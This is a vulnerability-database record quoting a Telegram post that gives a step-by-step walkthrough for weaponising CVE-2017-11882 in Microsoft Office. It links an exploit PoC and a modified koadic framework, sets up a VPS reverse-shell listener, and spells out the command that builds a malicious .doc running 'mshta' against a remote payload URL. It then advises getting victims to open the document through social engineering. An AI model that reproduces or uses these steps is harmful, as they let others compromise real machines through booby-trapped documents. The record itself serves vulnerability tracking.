{"uuid": "782c7c14-243e-4d1c-9172-65475f620152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2017-11882", "type": "exploited", "source": "https://t.me/indoghostsec/1934", "content": "By indoghostsec\n\nOffice Memory Corruption Vulnerability CVE-2017-11882: arbitrary code execution, denial of service on failed exploitation; a PoC has been released:\nfb.com/indoghostsec\n\n1) Microsoft Office once again has a memory corruption vulnerability, CVE ID CVE-2017-11882, which an attacker can exploit to execute arbitrary code in the context of the currently logged-in user.\n\n2) A failed exploitation attempt may cause a denial-of-service condition. Affected versions include the relevant releases of Office 2016, Office 2013, Office 2010 and Office 2007.\n\n3) Update: the PoC for Microsoft Office Memory Corruption Vulnerability CVE-2017-11882 has been released. The reason it is spreading so widely is that exploitation shows no popup or prompt, so the user notices nothing! Here is a simple reproduction for everyone.\n\nTools used:\n\n1) Penetration tool: koadic (used to build the payload and catch the shell). Tool address: https://github.com/weiruyi123/koadic (this is my modified version with the coding errors fixed)\n\n2) Vulnerability PoC: https://github.com/weiruyi123/CVE-2017-11882\n\n(The PoC has a limit on the command length. For details, see the README on GitHub.)\n\nOperating environment:\n\n1) Python 2.7\n\n2) Target: Windows Server 2008 R2 Standard, IP 192.168.1.171\n\n3) Attack machine: a VPS with a public IP (because I don't want to set up port forwarding, I use the VPS as the reverse-shell listener for this demonstration)\n\n4) Open bash and cd into the downloaded PoC directory. The PoC is written in Python, so a Python environment is required.\n\nNext we start the Windows Server virtual machine.\n\n5) Freshly installed virtual machine (without any patches).\n\nHere I ssh into my VPS and use git clone to download koadic. After recursively adding execute permissions to the directory, cd into the koadic directory and run ./koadic.py; this tool also requires a Python environment.\n\n6) Then we set LHOST and LPORT (blurred in the screenshot): fill in your intranet IP address (for an intranet engagement) or the port-forwarding address, then enter run to generate the payload.\n\n7) Copy 'mshta http://IP:2580/acg9N' and go back to bash in the PoC directory. The PoC usage is\n\npython Command_CVE-2017-11882.py -c \"cmd.exe /c calc.exe\" -o test.doc\n\n-c is the command to execute on the target and -o is the path of the generated document. We change the command after -c and the output location to suit the situation; with the payload command I generated this is\n\npython Command_CVE-2017-11882.py -c \"mshta http://IP:2580/acg9N\" -o test.doc\n\nOf course, you can also use msf to generate a PowerShell one-liner payload and substitute it for the -c parameter.\n\n8) We have now successfully generated a malicious document (see the picture sent by UndercOde).\n\n9) Next, you only need to get the document opened, through social engineering or other means. We will open the document in the Windows Server virtual machine.\n\n10) You will then see that a zombie with ID 0 has called back to koadic, and there is no error message on the target after the document is opened.\n\nWritten by INDOGHOSTSEC", "creation_timestamp": "2020-02-18T08:18:41.000000Z"}